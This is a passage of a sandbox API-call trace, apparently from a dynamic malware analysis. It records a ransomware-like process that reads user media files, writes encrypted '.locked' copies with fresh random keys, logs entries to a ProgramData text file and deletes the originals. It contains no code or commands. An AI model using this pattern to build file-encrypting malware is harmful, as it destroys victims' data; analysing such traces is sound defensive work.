(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI\\PigWS92hdGvp7.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\y7n qdyh ji\\pigws92hdgvp7.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0315.057] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.133] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12657e88 | out: lpMode=0x12657e88) returned 0 [0315.134] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.322] WriteFile (in: hFile=0x1e0, lpBuffer=0x12898000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12657e78, lpOverlapped=0x0 | out: lpBuffer=0x12898000*, lpNumberOfBytesWritten=0x12657e78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.343] CloseHandle (hObject=0x1e0) returned 1 [0315.344] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI\\PigWS92hdGvp7.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\y7n qdyh ji\\pigws92hdgvp7.bmp")) returned 1 [0315.374] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.481] SetEvent (hEvent=0x1dc) returned 1 [0315.481] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.592] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\pMFEi hP0gxXvAtY.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\pmfei hp0gxxvaty.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0315.592] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1276ed9c | out: lpMode=0x1276ed9c) returned 0 [0315.593] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\pMFEi hP0gxXvAtY.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\pmfei hp0gxxvaty.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0315.593] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1276ed9c | out: lpMode=0x1276ed9c) returned 0 [0315.593] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0315.593] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0315.593] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0315.594] WriteFile (in: hFile=0x1c8, lpBuffer=0x12ba0000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x12ba0000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0315.597] SetEvent (hEvent=0x220) returned 1 [0315.597] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.727] SetEvent (hEvent=0x22c) returned 1 [0315.727] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.730] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\NrMhV7-QFwSdl541.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\nrmhv7-qfwsdl541.jpg")) returned 1 [0315.864] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.918] SetEvent (hEvent=0x198) returned 1 [0315.918] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.924] SetEvent (hEvent=0x198) returned 1 [0315.924] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0315.938] SetEvent (hEvent=0x22c) returned 1 [0315.938] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0316.333] SetEvent (hEvent=0x198) returned 1 [0316.333] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0316.393] SetEvent (hEvent=0x190) returned 1 [0316.393] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0316.430] SetEvent (hEvent=0x134) returned 1 [0316.430] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0316.513] SetEvent (hEvent=0x14c) returned 1 [0316.513] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0317.507] SetEvent (hEvent=0x1f0) returned 1 [0317.507] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0317.512] SetEvent (hEvent=0x14c) returned 1 [0317.512] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.058] SetEvent (hEvent=0x1e8) returned 1 [0318.058] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.077] SetEvent (hEvent=0x190) returned 1 [0318.078] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.252] SetEvent (hEvent=0x134) returned 1 [0318.252] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.253] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.255] SetEvent (hEvent=0x22c) returned 1 [0318.255] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.259] SetEvent (hEvent=0x20c) returned 1 [0318.259] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.304] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.307] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.468] SetEvent (hEvent=0x12c) returned 1 [0318.468] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0318.498] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0320.206] SetEvent (hEvent=0x1e8) returned 1 [0320.206] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0320.211] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) Thread: id = 440 os_tid = 0xf38 [0260.677] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3392ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3392ff58*=0x1c4) returned 1 [0260.678] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c260*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x1234c260*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0260.680] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PNlMo1Rui9-Os7LqiJYf.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pnlmo1rui9-os7lqijyf.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0260.681] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0260.695] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PNlMo1Rui9-Os7LqiJYf.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pnlmo1rui9-os7lqijyf.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0261.344] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x220 [0261.344] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0261.915] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0261.916] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0261.916] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0261.916] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0261.916] WriteFile (in: hFile=0x180, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0261.918] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0261.947] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0261.948] SetEvent (hEvent=0x150) returned 1 [0261.948] SetEvent (hEvent=0x214) returned 1 [0261.948] SetEvent (hEvent=0x1dc) returned 1 [0261.948] SetEvent (hEvent=0x14c) returned 1 [0261.948] ReadFile (in: hFile=0x1c8, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a1d68*=0x18678, lpOverlapped=0x0) returned 1 [0261.951] WriteFile (in: hFile=0x180, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x18678, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x123a1d74*=0x18678, lpOverlapped=0x0) returned 1 [0262.087] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0262.982] ReadFile (in: hFile=0x1c8, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0262.983] CloseHandle (hObject=0x180) returned 1 [0262.999] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0263.148] CloseHandle (hObject=0x1c8) returned 1 [0263.148] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0263.148] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x123a1e94 | out: lpMode=0x123a1e94) returned 0 [0263.148] WriteFile (in: hFile=0x1c8, lpBuffer=0x1264a1c0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x123a1e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a1c0*, lpNumberOfBytesWritten=0x123a1e64*=0x3c, lpOverlapped=0x0) returned 1 [0263.148] CloseHandle (hObject=0x1c8) returned 1 [0263.150] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PNlMo1Rui9-Os7LqiJYf.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pnlmo1rui9-os7lqijyf.swf")) returned 1 [0265.060] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0265.939] SetEvent (hEvent=0x184) returned 1 [0265.940] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0266.002] SetEvent (hEvent=0x12c) returned 1 [0266.003] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0269.686] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\dda kMB.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dda kmb.jpg")) returned 1 [0270.114] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0270.198] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0270.204] SetEvent (hEvent=0x1dc) returned 1 [0270.204] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0270.224] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0270.229] SetEvent (hEvent=0x214) returned 1 [0270.229] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0272.909] SetEvent (hEvent=0x214) returned 1 [0272.909] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390240*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x12390240*, lpNumberOfCharsWritten=0x1265ba24*=0xb) returned 1 [0272.933] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0273.372] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\o7c4LDm2F7lcu2v.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\o7c4ldm2f7lcu2v.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0273.373] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0273.373] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\o7c4LDm2F7lcu2v.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\o7c4ldm2f7lcu2v.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0273.662] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0273.694] SetEvent (hEvent=0x190) returned 1 [0273.694] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0273.694] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.176] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c240 | out: pbBuffer=0x1234c240) returned 1 [0274.176] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8030 | out: pbBuffer=0x124a8030) returned 1 [0274.176] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0274.176] WriteFile (in: hFile=0x1c0, lpBuffer=0x1275f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x1275f000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0274.180] SetEvent (hEvent=0x21c) returned 1 [0274.180] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.249] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.314] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.324] SetEvent (hEvent=0x12c) returned 1 [0274.324] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.436] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.458] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.663] SetEvent (hEvent=0x1d0) returned 1 [0274.663] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0274.746] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0274.746] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0276.012] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0276.012] SetEvent (hEvent=0x104) returned 1 [0276.012] SetEvent (hEvent=0x1ac) returned 1 [0276.012] SetEvent (hEvent=0x14c) returned 1 [0276.013] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0276.034] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0276.035] SetEvent (hEvent=0x150) returned 1 [0276.035] SetEvent (hEvent=0x14c) returned 1 [0276.035] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0276.040] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\ynl0nO8fmos3T.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\ynl0no8fmos3t.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0276.041] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0276.041] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\ynl0nO8fmos3T.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\ynl0no8fmos3t.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0276.145] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0276.145] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0276.145] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8080 | out: pbBuffer=0x124a8080) returned 1 [0276.145] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0276.145] WriteFile (in: hFile=0x1f4, lpBuffer=0x1266f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x1266f000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0276.188] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0276.262] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0276.262] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0276.262] SetEvent (hEvent=0x184) returned 1 [0276.262] SetEvent (hEvent=0x104) returned 1 [0276.262] SetEvent (hEvent=0x14c) returned 1 [0276.262] ReadFile (in: hFile=0x188, lpBuffer=0x1532a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesRead=0x1239dd68*=0xffcc, lpOverlapped=0x0) returned 1 [0276.268] WriteFile (in: hFile=0x1f4, lpBuffer=0x1532a000*, nNumberOfBytesToWrite=0xffcc, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesWritten=0x1239dd74*=0xffcc, lpOverlapped=0x0) returned 1 [0276.441] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0277.543] ReadFile (in: hFile=0x188, lpBuffer=0x1532a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0277.543] CloseHandle (hObject=0x1f4) returned 1 [0277.547] CloseHandle (hObject=0x188) returned 1 [0277.547] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0277.547] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0277.548] WriteFile (in: hFile=0x188, lpBuffer=0x125740a0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x125740a0*, lpNumberOfBytesWritten=0x1239de64*=0x4d, lpOverlapped=0x0) returned 1 [0277.548] CloseHandle (hObject=0x188) returned 1 [0277.549] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\ynl0nO8fmos3T.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\ynl0no8fmos3t.mp4")) returned 1 [0277.847] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0278.153] SetEvent (hEvent=0x12c) returned 1 [0278.154] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0278.215] SetEvent (hEvent=0x134) returned 1 [0278.215] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0278.779] SetEvent (hEvent=0x12c) returned 1 [0278.779] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0279.616] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0279.728] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\YRFgwGf 0zYgcMX.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\yrfgwgf 0zygcmx.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0279.728] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0279.728] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\YRFgwGf 0zYgcMX.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\yrfgwgf 0zygcmx.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0280.157] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0280.157] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e100 | out: pbBuffer=0x1263e100) returned 1 [0280.157] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e0e0 | out: pbBuffer=0x1234e0e0) returned 1 [0280.157] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340701 | out: pbBuffer=0x12340701) returned 1 [0280.157] WriteFile (in: hFile=0x1bc, lpBuffer=0x12701000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x12701000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0280.161] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0280.161] SetEvent (hEvent=0x14c) returned 1 [0280.161] SetEvent (hEvent=0x22c) returned 1 [0280.161] SetEvent (hEvent=0x21c) returned 1 [0280.161] ReadFile (in: hFile=0x19c, lpBuffer=0x15b60000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x15b60000*, lpNumberOfBytesRead=0x123a1d68*=0x51a1, lpOverlapped=0x0) returned 1 [0280.163] WriteFile (in: hFile=0x1bc, lpBuffer=0x15b60000*, nNumberOfBytesToWrite=0x51a1, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x15b60000*, lpNumberOfBytesWritten=0x123a1d74*=0x51a1, lpOverlapped=0x0) returned 1 [0280.258] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0280.513] ReadFile (in: hFile=0x19c, lpBuffer=0x15b60000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x15b60000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0280.514] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0280.620] SetEvent (hEvent=0x104) returned 1 [0280.620] CloseHandle (hObject=0x1bc) returned 1 [0280.623] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0282.458] CloseHandle (hObject=0x19c) returned 1 [0282.459] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0282.459] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x123a1e94 | out: lpMode=0x123a1e94) returned 0 [0282.459] WriteFile (in: hFile=0x19c, lpBuffer=0x125ec0f0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x123a1e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0f0*, lpNumberOfBytesWritten=0x123a1e64*=0x49, lpOverlapped=0x0) returned 1 